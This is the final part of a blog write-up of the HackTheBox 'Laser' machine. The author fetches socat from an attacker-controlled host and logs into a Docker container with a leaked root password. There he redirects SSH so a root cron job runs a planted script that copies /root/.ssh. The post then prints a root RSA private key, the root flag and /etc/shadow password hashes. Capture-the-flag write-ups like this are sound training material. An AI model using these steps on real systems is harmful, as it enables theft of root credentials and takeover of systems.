-rw-rw-r--  1 solr solr       8 Jun 29 04:46 solr-8984.pid
drwx------  2 solr solr    4096 Aug 23 13:52 .ssh
solr@laser:~$ 

Uploading socat to the docker instance

Let us upload the socat first.

solr@laser:~$ wget http://10.10.14.21:8000/socat
--2020-08-23 17:37:22--  http://10.10.14.21:8000/socat
Connecting to 10.10.14.21:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat                    100%[===============================>] 366.38K   329KB/s    in 1.1s    

2020-08-23 17:37:24 (329 KB/s) - ‘socat’ saved [375176/375176]

solr@laser:~$ ls
data  log4j2.xml  logs	pspy64s  pspy64s.1  socat  solr-8983.pid  solr-8984.pid
solr@laser:~$ chmod +x socat
solr@laser:~$ ls -la
total 2680
drwxr-x---  8 solr solr    4096 Aug 23 17:37 .
drwxr-xr-x 14 root root    4096 Jun 26 13:02 ..
lrwxrwxrwx  1 solr solr       9 Jun 29 06:57 .bash_history -> /dev/null
drwxrwxr-x  3 solr solr    4096 Jul  6 07:06 .cache
drwxr-x---  5 solr solr    4096 Jun 29 04:50 data
drwx------  4 solr solr    4096 Jun 29 06:57 .local
-rw-r-----  1 solr solr    5027 Jun 26 13:02 log4j2.xml
drwxr-x---  2 solr solr    4096 Aug 23 13:46 logs
drwxrwxr-x  2 solr solr    4096 Jun 26 13:02 .oracle_jre_usage
-rwxrwxr-x  1 solr solr 1156536 Aug 22  2019 pspy64s
-rwxrwxr-x  1 solr solr  375176 Aug 23 17:31 socat
-rw-rw-r--  1 solr solr       5 Aug 23 13:44 solr-8983.pid
-rw-rw-r--  1 solr solr       8 Jun 29 04:46 solr-8984.pid
drwx------  2 solr solr    4096 Aug 23 13:52 .ssh

Then, upload it to the docker instance.

solr@laser:~$ sshpass -p c413d115b3d87664499624e7826d8c5a scp socat root@172.18.0.2:socat
solr@laser:~$ sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2 chmod +x socat

In the next step, we connect to the docker unstance using root credential. And then stop the sshd and lastly redirect the ssh to 172.18.0.1.

More about The Socat Port redirection:

https://www.cyberciti.biz/faq/linux-unix-tcp-port-forwarding/

solr@laser:~$ sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2
.
.
.
root@20e3289bc183:~# service ssh stop
 * Stopping OpenBSD Secure Shell server sshd                                              [ OK ] 
root@20e3289bc183:~# ./socat tcp-listen:22,fork TCP:172.18.0.1:22

The Other Terminal

Once the redirection is applied, the shell will start listening. Then, I opened another terminal and logged-in again with solr ssh.

I made a temporary file clear.sh in the directory /tmp/ and then made a bash script to create “/tmp/exploit”, which is a copy of “/root/.ssh”.

#!/bin/sh\mkdir -p /tmp/exploit;cp -R /root/.ssh /tmp/pwn; chown -R solr:solr /tmp/exploit' > /tmp/clear.sh; chmod +x /tmp/clear.sh

I waited for like 20 seconds to job to run. Once the cron job runs, the new directory exploit will be created with root .ssh/id_rsa.

solr@laser:/tmp$ cat /tmp/exploit/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIG5AIBAAKCAYEAsCjrnKOm6iJddcSIyFamlV1qx6yT9X+X/HXW7PlCGMif79md
zutss91E+K5D/xLe/YpUHCcTUhfPGjBjdPmptCPaiHd30XN5FmBxmN++MAO68Hjs
oIEgi+2tScVpokjgkF411nIS+4umg6Q+ALO3IKGortuRkOtZNdPFSv0+1Am6PdvF
ibyGDi8ieYIK4dIZF9slEoqPlnV9lz0YWwRmSobZYQ7xX1wtmnaIrIxgHmpBYGBW
QQ7718Kh6RNnvCh3UPEjx9GIh+2y5Jj7uxGLLDAQ3YbMKxm2ykChfI7L95kzuxQe
mwQvIVe+R+ORLQJmBanA7AiyEyHBUYN27CF2B9wLgTj0LzHowc1xEcttbalNyL6x
..........................[snip]................................
1u8GCx6aqWvy3zoqss6F7axiQsCOD/Q4WU/UHgGb5ndgBpevw+ga2CABiF9sN53E
BuF2tOzZmAZZH3dj3VuGn+xmYcO9cy7nX4qeera6z4MQMRUcJjf9HoOwqhuK8nTa
xeZ1WSAWwDx/7n4KiFyxBYHCpcfCQBz6cxkGXMSpwsW8Si2dAoHBAOEfVHHzY1NN
9zmBThmj4+LRziBTcVxT/KWtSaSbpmLE3gLqTqvRXSlNNM9ZFb2+TpPe1tGsINO3
nVIoF/A97pHpw2YRtbHFscJbhUCkP65ZOcQg+hQcBGvi9VEmfve/OPHMiSvTSBNS
bgJuljQ7Wp+CYpVpDpxoHgHOZCCdD+WRRlacU/GKkex1gYuoL7iHFVQuBMD6jyjo
1DfJUHHfYdOqwfQX2ZgUX0VPD2RvtP3Z0ta/VJJiWtE8o8RwHgjiGw==
-----END RSA PRIVATE KEY-----

Once I confirmed the private key is copied, I used another session of SSH to root@localhost.

solr@laser:/tmp$ ssh -i /tmp/exploit/.ssh/id_rsa root@localhost
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 23 Aug 2020 05:44:47 PM UTC

  System load:                      0.19
  Usage of /:                       42.3% of 19.56GB
  Memory usage:                     71%
  Swap usage:                       3%
  Processes:                        276
  Users logged in:                  2
  IPv4 address for br-3ae8661b394c: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.201
  IPv6 address for ens160:          dead:beef::250:56ff:feb9:1961

 * Are you ready for Kubernetes 1.19? It's nearly here! Try RC3 with
   sudo snap install microk8s --channel=1.19/candidate --classic

   https://www.microk8s.io/ has docs and details.

73 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Aug 23 15:41:15 2020 from 10.10.14.16
root@laser:~# id
uid=0(root) gid=0(root) groups=0(root)
root@laser:~# ls -la
total 56
drwx------  6 root root 4096 Aug  4 07:04 .
drwxr-xr-x 20 root root 4096 May  7 12:38 ..
lrwxrwxrwx  1 root root    9 Jun 15 04:04 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  3 root root 4096 Aug  3 13:03 .cache
-rwxr-xr-x  1 root root   59 Jun 24 05:14 clear.sh
-rwxr-xr-x  1 root root  346 Aug  3 04:25 feed.sh
drwxr-xr-x  3 root root 4096 Jul  1 03:33 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rwxrwxr-x  1 root root  433 Jun 29 06:48 reset.sh
-r--------  1 root root   33 Aug 23 13:46 root.txt
-rw-r--r--  1 root root   66 Aug  4 07:04 .selected_editor
drwxr-xr-x  3 root root 4096 May 18 08:44 snap
drwx------  2 root root 4096 Jul  6 06:11 .ssh
-rwxr-xr-x  1 root root  265 Jun 26 11:36 update.sh
root@laser:~# cd /root/
root@laser:~# ls
clear.sh  feed.sh  reset.sh  root.txt  snap  update.sh
root@laser:~# cat root.txt 
a8908469127c2574074cc5675582808c
root@laser:~# 

And that’s all, we are root.

oot@laser:~# 
root@laser:~# cat /etc/shadow
root:$6$b2FcSDlvmrWQlTYc$XuAR1xjZc6XLbR9Q.HiVV2gLjtIwmsWIDFbG3Ghvrsx.3PEgswvif1Sb23SuiDPp0H1SSY4i8vJIAsL5Kewh3/:18432:0:99999:7:::
daemon:*:18375:0:99999:7:::
bin:*:18375:0:99999:7:::
sys:*:18375:0:99999:7:::
sync:*:18375:0:99999:7:::
games:*:18375:0:99999:7:::
man:*:18375:0:99999:7:::
lp:*:18375:0:99999:7:::
mail:*:18375:0:99999:7:::
news:*:18375:0:99999:7:::
uucp:*:18375:0:99999:7:::
proxy:*:18375:0:99999:7:::
www-data:*:18375:0:99999:7:::
backup:*:18375:0:99999:7:::
list:*:18375:0:99999:7:::
irc:*:18375:0:99999:7:::
gnats:*:18375:0:99999:7:::
nobody:*:18375:0:99999:7:::
systemd-network:*:18375:0:99999:7:::
systemd-resolve:*:18375:0:99999:7:::
systemd-timesync:*:18375:0:99999:7:::
messagebus:*:18375:0:99999:7:::
syslog:*:18375:0:99999:7:::
_apt:*:18375:0:99999:7:::
tss:*:18375:0:99999:7:::
uuidd:*:18375:0:99999:7:::
tcpdump:*:18375:0:99999:7:::
landscape:*:18375:0:99999:7:::
pollinate:*:18375:0:99999:7:::
sshd:*:18389:0:99999:7:::
systemd-coredump:!!:18389::::::
lxd:!:18389::::::
printer:!:18428::::::
mosquitto:*:18429:0:99999:7:::
dnsmasq:*:18429:0:99999:7:::
solr:$6$SUBQ8M9J8E9BsiO/$SKoqY7XgKDcNPuOtILDVnlrY7itKl9EF6A.RidWt6.kvCsSt98DKfzJCtMX/3aPpW5zGRDBuSZKlPVDAcHaoK/:18443:0:99999:7:::
root@laser:~# 

So that was the greatest journey so far. What a machine. Thank you for your visit and reading my writeup. See you soon.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

View all posts by Navin →
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.